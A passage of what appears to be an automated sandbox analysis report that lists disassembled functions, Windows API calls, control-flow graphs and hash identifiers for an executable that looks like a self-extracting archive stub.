                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
                                                                                              • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                                                                                              • API String ID: 566448164-801612888
                                                                                              • Opcode ID: 50413f5131542283e80c6a4eb681899b5a0182619a3188892206dff28bbd7b2a
                                                                                              • Instruction ID: 6d56771bd560053d599df51ece3dc9d08da540f73b5aaeae0e59d90d1d6c32d3
                                                                                              • Opcode Fuzzy Hash: 50413f5131542283e80c6a4eb681899b5a0182619a3188892206dff28bbd7b2a
                                                                                              • Instruction Fuzzy Hash: AA32047190021A9BCF24EF68CC41BEE77A4FF06708F40456AFA1697291E7B1DE85DB90
                                                                                              Function 00CBD4D4 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97windowCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 00CBB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00CBB579
                                                                                                • Part of subcall function 00CBB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CBB58A
                                                                                                • Part of subcall function 00CBB568: IsDialogMessageW.USER32(0001046E,?), ref: 00CBB59E
                                                                                                • Part of subcall function 00CBB568: TranslateMessage.USER32(?), ref: 00CBB5AC
                                                                                                • Part of subcall function 00CBB568: DispatchMessageW.USER32(?), ref: 00CBB5B6
                                                                                              • GetDlgItem.USER32(00000068,00CFFCB8), ref: 00CBD4E8
                                                                                              • ShowWindow.USER32(00000000,00000005,?,?,?,00CBAF07,00000001,?,?,00CBB7B9,00CD506C,00CFFCB8,00CFFCB8,00001000,00000000,00000000), ref: 00CBD510
                                                                                              • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00CBD51B
                                                                                              • SendMessageW.USER32(00000000,000000C2,00000000,00CD35F4), ref: 00CBD529
                                                                                              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00CBD53F
                                                                                              • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00CBD559
                                                                                              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00CBD59D
                                                                                              • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00CBD5AB
                                                                                              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00CBD5BA
                                                                                              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00CBD5E1
                                                                                              • SendMessageW.USER32(00000000,000000C2,00000000,00CD43F4), ref: 00CBD5F0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                                              • String ID: \
                                                                                              • API String ID: 3569833718-2967466578
                                                                                              • Opcode ID: 813c7f564e031d96277e55b2fe2ec08334bf520c93227eec9fc8d7ed16edec66
                                                                                              • Instruction ID: c39e62f4638d847c33ca38c41e0333dbb4e60431581dc3b1e2302ce7c6d92fc2
                                                                                              • Opcode Fuzzy Hash: 813c7f564e031d96277e55b2fe2ec08334bf520c93227eec9fc8d7ed16edec66
                                                                                              • Instruction Fuzzy Hash: E431CF71146346AFE311DF21AC4AFAB7FACEB86704F000518F655D62E0EB748A0887B6
                                                                                              Function 00CBD78F Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 184COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 836 cbd78f-cbd7a7 call cbec50 839 cbd9e8-cbd9f0 836->839 840 cbd7ad-cbd7b9 call cc3e13 836->840 840->839 843 cbd7bf-cbd7e7 call cbfff0 840->843 846 cbd7e9 843->846 847 cbd7f1-cbd7ff 843->847 846->847 848 cbd812-cbd818 847->848 849 cbd801-cbd804 847->849 851 cbd85b-cbd85e 848->851 850 cbd808-cbd80e 849->850 853 cbd810 850->853 854 cbd837-cbd844 850->854 851->850 852 cbd860-cbd866 851->852 855 cbd868-cbd86b 852->855 856 cbd86d-cbd86f 852->856 857 cbd822-cbd82c 853->857 858 cbd84a-cbd84e 854->858 859 cbd9c0-cbd9c2 854->859 855->856 860 cbd882-cbd898 call cab92d 855->860 856->860 861 cbd871-cbd878 856->861 862 cbd81a-cbd820 857->862 863 cbd82e 857->863 864 cbd9c6 858->864 865 cbd854-cbd859 858->865 859->864 872 cbd89a-cbd8a7 call cb1fbb 860->872 873 cbd8b1-cbd8bc call caa231 860->873 861->860 866 cbd87a 861->866 862->857 868 cbd830-cbd833 862->868 863->854 869 cbd9cf 864->869 865->851 866->860 868->854 871 cbd9d6-cbd9d8 869->871 874 cbd9da-cbd9dc 871->874 875 cbd9e7 871->875 872->873 883 cbd8a9 872->883 881 cbd8d9-cbd8e6 ShellExecuteExW 873->881 882 cbd8be-cbd8d5 call cab6c4 873->882 874->875 878 cbd9de-cbd9e1 ShowWindow 874->878 875->839 878->875 881->875 885 cbd8ec-cbd8f9 881->885 882->881 883->873 887 cbd8fb-cbd902 885->887 888 cbd90c-cbd90e 885->888 887->888 889 cbd904-cbd90a 887->889 890 cbd910-cbd919 888->890 891 cbd925-cbd944 call cbdc3b 888->891 889->888 892 cbd97b-cbd987 CloseHandle 889->892 890->891 899 cbd91b-cbd923 ShowWindow 890->899 891->892 904 cbd946-cbd94e 891->904 893 cbd989-cbd996 call cb1fbb 892->893 894 cbd998-cbd9a6 892->894 893->869 893->894 894->871 898 cbd9a8-cbd9aa 894->898 898->871 903 cbd9ac-cbd9b2 898->903 899->891 903->871 905 cbd9b4-cbd9be 903->905 904->892 906 cbd950-cbd961 GetExitCodeProcess 904->906 905->871 906->892 907 cbd963-cbd96d 906->907 908 cbd96f 907->908 909 cbd974 907->909 908->909 909->892
                                                                                              APIs
                                                                                              • _wcslen.LIBCMT ref: 00CBD7AE
                                                                                              • ShellExecuteExW.SHELL32(?), ref: 00CBD8DE
                                                                                              • ShowWindow.USER32(?,00000000), ref: 00CBD91D
                                                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 00CBD959
                                                                                              • CloseHandle.KERNEL32(?), ref: 00CBD97F
                                                                                              • ShowWindow.USER32(?,00000001), ref: 00CBD9E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                                                                              • String ID: .exe$.inf
                                                                                              • API String ID: 36480843-3750412487
                                                                                              • Opcode ID: c47b8dcf54fc1a16f3028ab6d6364f3ad7111c977cb84311a936115c4bf3b5be
                                                                                              • Instruction ID: de231151d2098269ee19c3552789dd4b7849f569190ee5e6e3fe0afeb951738c
                                                                                              • Opcode Fuzzy Hash: c47b8dcf54fc1a16f3028ab6d6364f3ad7111c977cb84311a936115c4bf3b5be
                                                                                              • Instruction Fuzzy Hash: 9B51E5708043809ADB309F64A844BFB7BE4AF46744F04041EF5D6972A1FB728F85DB52
                                                                                              Function 00CCA95B Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 910 cca95b-cca974 911 cca98a-cca98f 910->911 912 cca976-cca986 call ccef4c 910->912 914 cca99c-cca9c0 MultiByteToWideChar 911->914 915 cca991-cca999 911->915 912->911 919 cca988 912->919 917 cca9c6-cca9d2 914->917 918 ccab53-ccab66 call cbfbbc 914->918 915->914 920 cca9d4-cca9e5 917->920 921 ccaa26 917->921 919->911 924 ccaa04-ccaa15 call cc8e06 920->924 925 cca9e7-cca9f6 call cd2010 920->925 923 ccaa28-ccaa2a 921->923 927 ccab48 923->927 928 ccaa30-ccaa43 MultiByteToWideChar 923->928 924->927 935 ccaa1b 924->935 925->927 938 cca9fc-ccaa02 925->938 932 ccab4a-ccab51 call ccabc3 927->932 928->927 931 ccaa49-ccaa5b call ccaf6c 928->931 940 ccaa60-ccaa64 931->940 932->918 939 ccaa21-ccaa24 935->939 938->939 939->923 940->927 942 ccaa6a-ccaa71 940->942 943 ccaaab-ccaab7 942->943 944 ccaa73-ccaa78 942->944 945 ccaab9-ccaaca 943->945 946 ccab03 943->946 944->932 947 ccaa7e-ccaa80 944->947 948 ccaacc-ccaadb call cd2010 945->948 949 ccaae5-ccaaf6 call cc8e06 945->949 950 ccab05-ccab07 946->950 947->927 951 ccaa86-ccaaa0 call ccaf6c 947->951 955 ccab41-ccab47 call ccabc3 948->955 962 ccaadd-ccaae3 948->962 949->955 964 ccaaf8 949->964 954 ccab09-ccab22 call ccaf6c 950->954 950->955 951->932 966 ccaaa6 951->966 954->955 968 ccab24-ccab2b 954->968 955->927 967 ccaafe-ccab01 962->967 964->967 966->927 967->950 969 ccab2d-ccab2e 968->969 970 ccab67-ccab6d 968->970 971 ccab2f-ccab3f WideCharToMultiByte 969->971 970->971 971->955 972 ccab6f-ccab76 call ccabc3 971->972 972->932
                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00CC5695,00CC5695,?,?,?,00CCABAC,00000001,00000001,2DE85006), ref: 00CCA9B5
                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00CCABAC,00000001,00000001,2DE85006,?,?,?), ref: 00CCAA3B
                                                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00CCAB35
                                                                                              • __freea.LIBCMT ref: 00CCAB42
                                                                                                • Part of subcall function 00CC8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00CCCA2C,00000000,?,00CC6CBE,?,00000008,?,00CC91E0,?,?,?), ref: 00CC8E38
                                                                                              • __freea.LIBCMT ref: 00CCAB4B
                                                                                              • __freea.LIBCMT ref: 00CCAB70
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1414292761-0
                                                                                              • Opcode ID: a48d944ffa07c1d133ca6b992d5c381d3e60db4252c7c2742f93e03d621276fd
                                                                                              • Instruction ID: 09d8fee3208e3345e85151fd557d9c8c17fb98e3b4330ff46c023a6a1ed9bd4e
                                                                                              • Opcode Fuzzy Hash: a48d944ffa07c1d133ca6b992d5c381d3e60db4252c7c2742f93e03d621276fd
                                                                                              • Instruction Fuzzy Hash: DB51F272A0021AAFDB258F64CC59FBFB7AAEB40718F15462DFC14D6140EB30DD40E692
                                                                                              Function 00CC3B72 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63COMMONLIBRARYCODE
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 975 cc3b72-cc3b7c 976 cc3bee-cc3bf1 975->976 977 cc3b7e-cc3b8c 976->977 978 cc3bf3 976->978 980 cc3b8e-cc3b91 977->980 981 cc3b95-cc3bb1 LoadLibraryExW 977->981 979 cc3bf5-cc3bf9 978->979 982 cc3c09-cc3c0b 980->982 983 cc3b93 980->983 984 cc3bfa-cc3c00 981->984 985 cc3bb3-cc3bbc GetLastError 981->985 982->979 987 cc3beb 983->987 984->982 986 cc3c02-cc3c03 FreeLibrary 984->986 988 cc3bbe-cc3bd3 call cc6088 985->988 989 cc3be6-cc3be9 985->989 986->982 987->976 988->989 992 cc3bd5-cc3be4 LoadLibraryExW 988->992 989->987 992->984 992->989
                                                                                              APIs
                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,00CC3C35,?,?,00D02088,00000000,?,00CC3D60,00000004,InitializeCriticalSectionEx,00CD6394,InitializeCriticalSectionEx,00000000), ref: 00CC3C03
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeLibrary
                                                                                              • String ID: api-ms-
                                                                                              • API String ID: 3664257935-2084034818
                                                                                              • Opcode ID: 9f14fe4840e663526013d88c6bbf18997dff20a87762c9e2ea6b5985fdb17175
                                                                                              • Instruction ID: 52baca03c0c62913af53c952ce1905f0eb71615f8be309e607c3a8d44b487bde
                                                                                              • Opcode Fuzzy Hash: 9f14fe4840e663526013d88c6bbf18997dff20a87762c9e2ea6b5985fdb17175
                                                                                              • Instruction Fuzzy Hash: 38110635A052A1ABCB228B6CEC55F5D37649F05770F214225F925FB2D0E770EF008AD1
                                                                                              Function 00CA98E0 Relevance: 7.6, APIs: 5, Instructions: 111filetimeCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 993 ca98e0-ca9901 call cbec50 996 ca990c 993->996 997 ca9903-ca9906 993->997 999 ca990e-ca991f 996->999 997->996 998 ca9908-ca990a 997->998 998->999 1000 ca9921 999->1000 1001 ca9927-ca9931 999->1001 1000->1001 1002 ca9933 1001->1002 1003 ca9936-ca9943 call ca6edb 1001->1003 1002->1003 1006 ca994b-ca996a CreateFileW 1003->1006 1007 ca9945 1003->1007 1008 ca99bb-ca99bf 1006->1008 1009 ca996c-ca998e GetLastError call cabb03 1006->1009 1007->1006 1010 ca99c3-ca99c6 1008->1010 1013 ca99c8-ca99cd 1009->1013 1015 ca9990-ca99b3 CreateFileW GetLastError 1009->1015 1010->1013 1014 ca99d9-ca99de 1010->1014 1013->1014 1016 ca99cf 1013->1016 1017 ca99ff-ca9a10 1014->1017 1018 ca99e0-ca99e3 1014->1018 1015->1010 1019 ca99b5-ca99b9 1015->1019 1016->1014 1021 ca9a2e-ca9a39 1017->1021 1022 ca9a12-ca9a2a call cb0602 1017->1022 1018->1017 1020 ca99e5-ca99f9 SetFileTime 1018->1020 1019->1010 1020->1017 1022->1021
                                                                                              APIs
                                                                                              • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00CA7760,?,00000005,?,00000011), ref: 00CA995F
                                                                                              • GetLastError.KERNEL32(?,?,00CA7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00CA996C
                                                                                              • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00CA7760,?,00000005,?), ref: 00CA99A2
                                                                                              • GetLastError.KERNEL32(?,?,00CA7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00CA99AA
                                                                                              • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00CA7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00CA99F9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$CreateErrorLast$Time
                                                                                              • String ID:
                                                                                              • API String ID: 1999340476-0
                                                                                              • Opcode ID: 071dc1233f5bacbab56b7f8b50ac12f6649e342c72fc678fe1b3119df82c96bd
                                                                                              • Instruction ID: a3b218c756548c5e7ec44cf139d3596cc0db730fc16133e03ca362589a30111a
                                                                                              • Opcode Fuzzy Hash: 071dc1233f5bacbab56b7f8b50ac12f6649e342c72fc678fe1b3119df82c96bd
                                                                                              • Instruction Fuzzy Hash: 0C3115305443867FE7209B34CC46BDBBB98FB06328F100B19F9B5961D1D7B5AA44CB95
                                                                                              Function 00CBB568 Relevance: 7.5, APIs: 5, Instructions: 38windowCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1052 cbb568-cbb581 PeekMessageW 1053 cbb5bc-cbb5be 1052->1053 1054 cbb583-cbb597 GetMessageW 1052->1054 1055 cbb599-cbb5a6 IsDialogMessageW 1054->1055 1056 cbb5a8-cbb5b6 TranslateMessage DispatchMessageW 1054->1056 1055->1053 1055->1056 1056->1053
                                                                                              APIs
                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00CBB579
                                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CBB58A
                                                                                              • IsDialogMessageW.USER32(0001046E,?), ref: 00CBB59E
                                                                                              • TranslateMessage.USER32(?), ref: 00CBB5AC
                                                                                              • DispatchMessageW.USER32(?), ref: 00CBB5B6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$DialogDispatchPeekTranslate
                                                                                              • String ID:
                                                                                              • API String ID: 1266772231-0
                                                                                              • Opcode ID: e3ecf8d4c8e05dae66c7302f54da6ee22830ddd65d8600e134fdcf40729098a9
                                                                                              • Instruction ID: 8af23210dca3a17d852ca747d23db509c157c7b28cf8cdaf25952a7b43684812
                                                                                              • Opcode Fuzzy Hash: e3ecf8d4c8e05dae66c7302f54da6ee22830ddd65d8600e134fdcf40729098a9
                                                                                              • Instruction Fuzzy Hash: CDF06D71E0221AABDB209FE6AC4CEDB7FACEE056917404415B519D2150EB74D609CBB1
                                                                                              Function 00CBABAB Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1057 cbabab-cbabca GetClassNameW 1058 cbabcc-cbabe1 call cb1fbb 1057->1058 1059 cbabf2-cbabf4 1057->1059 1064 cbabe3-cbabef FindWindowExW 1058->1064 1065 cbabf1 1058->1065 1061 cbabff-cbac01 1059->1061 1062 cbabf6-cbabf9 SHAutoComplete 1059->1062 1062->1061 1064->1065 1065->1059
                                                                                              APIs
                                                                                              • GetClassNameW.USER32(?,?,00000050), ref: 00CBABC2
                                                                                              • SHAutoComplete.SHLWAPI(?,00000010), ref: 00CBABF9
                                                                                                • Part of subcall function 00CB1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00CAC116,00000000,.exe,?,?,00000800,?,?,?,00CB8E3C), ref: 00CB1FD1
                                                                                              • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00CBABE9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                              • String ID: EDIT
                                                                                              • API String ID: 4243998846-3080729518
                                                                                              • Opcode ID: f64096bb7f54f2186942f590f6e4131be7b6a620a08f184bb280eebbdd98da5f
                                                                                              • Instruction ID: 749da8f7f7489ddb49b1f9b98851cc2afdd61a7db8fe279d8d709b6a4fec9943
                                                                                              • Opcode Fuzzy Hash: f64096bb7f54f2186942f590f6e4131be7b6a620a08f184bb280eebbdd98da5f
                                                                                              • Instruction Fuzzy Hash: 44F0823260132877DB205A649C09FDB766C9B46B40F494016BA59E2280D761DB45C6B6
                                                                                              Function 00CBAC16 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34comCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 00CB081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00CB0836
                                                                                                • Part of subcall function 00CB081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00CAF2D8,Crypt32.dll,00000000,00CAF35C,?,?,00CAF33E,?,?,?), ref: 00CB0858
                                                                                              • OleInitialize.OLE32(00000000), ref: 00CBAC2F
                                                                                              • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00CBAC66
                                                                                              • SHGetMalloc.SHELL32(00CE8438), ref: 00CBAC70
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                                                              • String ID: riched20.dll
                                                                                              • API String ID: 3498096277-3360196438
                                                                                              • Opcode ID: 71b97543c348c97e38503ebaa6a4315ed4b1623cd9857f90c0b1630e988ff3f9
                                                                                              • Instruction ID: 8272c69b5e25e3c8e62dfbfc42204234d74b506de2a2d793bc88bc7ccd216bc4
                                                                                              • Opcode Fuzzy Hash: 71b97543c348c97e38503ebaa6a4315ed4b1623cd9857f90c0b1630e988ff3f9
                                                                                              • Instruction Fuzzy Hash: 67F01DB1D00209ABCB10AFAAD849AEFFFFCEF94700F00416AE515E2251DBB45605CFA1
                                                                                              Function 00CBDBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1070 cbdbde-cbdc09 call cbec50 SetEnvironmentVariableW call cb0371 1074 cbdc0e-cbdc12 1070->1074 1075 cbdc36-cbdc38 1074->1075 1076 cbdc14-cbdc18 1074->1076 1077 cbdc21-cbdc28 call cb048d 1076->1077 1080 cbdc1a-cbdc20 1077->1080 1081 cbdc2a-cbdc30 SetEnvironmentVariableW 1077->1081 1080->1077 1081->1075
                                                                                              APIs
                                                                                              • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00CBDBF4
                                                                                              • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00CBDC30
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
